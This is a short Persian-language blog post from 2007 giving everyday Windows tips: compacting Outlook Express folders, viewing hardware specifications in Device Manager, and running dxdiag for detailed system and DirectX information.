- پاکسازی Outlook Express در OE یا همان Outlook Express وقتي ايميلی‌ را پاک می‌کنيد يا به پوشه‌ی ديگری منتقل می‌کنيد، آن ايميل به عنوان پاک‌شده، علامت‌گذاری می‌شود، بدون اينکه واقعاً پاک شود. که اين‌امر به مرور زمان باعث حجيم شدن پيغام‌ها و کند شدن برنامه می‌شود. روی پوشه‌ پيغام‌های پاک‌شده، راست‌کليک کرده و محتوای آن‌را خالی کنید. بعد اين مسير را طی کنید؛
Files –> Folder –> Compact all folders
تا فضایی که پيغام‌های علامت‌خورده اشغال کرده‌اند، آزاد شود. اگر قبلا اين کار را نکرديد، ممکن‌ است مقداری به‌طول بکشد. بعد از اين، Outlook بطور قابل‌توجهی سريع‌تر اجرا می‌شود.
- به دست آوردن مشخصات سيستم مواقعی که در استفاده از ويندوز يا کلا کامپيوترتان به مشکل برمی‌خورید، معمولا اولين سؤالی که تعميرکارها از شما می‌پرسن، مشخصات سخت‌افزاری سيستم شماست. در اکثر مواقع اين مشخصات را بدون باز کردن Case می‌توان به دست آورد. روي My Computer کليک‌راست کرده و Propertiese را انتخاب کنيد يا به Control Panel رفته و روی System کليک کنید. سپس بسته به نوع ويندوز ( در ويندوز XP روي Hardware کلیک کنید ) به Device Manager برويد. در اينجا مشخصات سخت‌افزاری دستگاه شما، به همراه مدل هر قطعه، نشان داده می‌شود. با دوبار کليک بر روی هر گزينه مشخصات جزئی‌تر آن و در بعضی مدل‌ها گزينه‌ای برای عيب‌يابی ظاهر می‌شود.
- بدست آوردن مشخصات جزئی‌تر سیستم براي ديدن اطلاعات دقيق‌تر و کامل‌تر از سخت‌افزار سيستم‌تان، به منوی Start رفته و روی Run کليک کنيد. حال عبارت dxdiag را وارد کرده و اینتر را بزنید. در اينجا اطلاعات کامل‌تر و همچنين گزينه‌ای برای تشخيص مشکلات مربوط به Directx وجود دارد. در گزينه Sound ، System و Display adapter اطلاعات مفيدی در مورد CPU، حافظه، کارت صدا و کارت گرافيک وجود دارد.

|+| نوشته شده توسط احسان در شنبه دوم تیر 1386 ساعت 14:22 |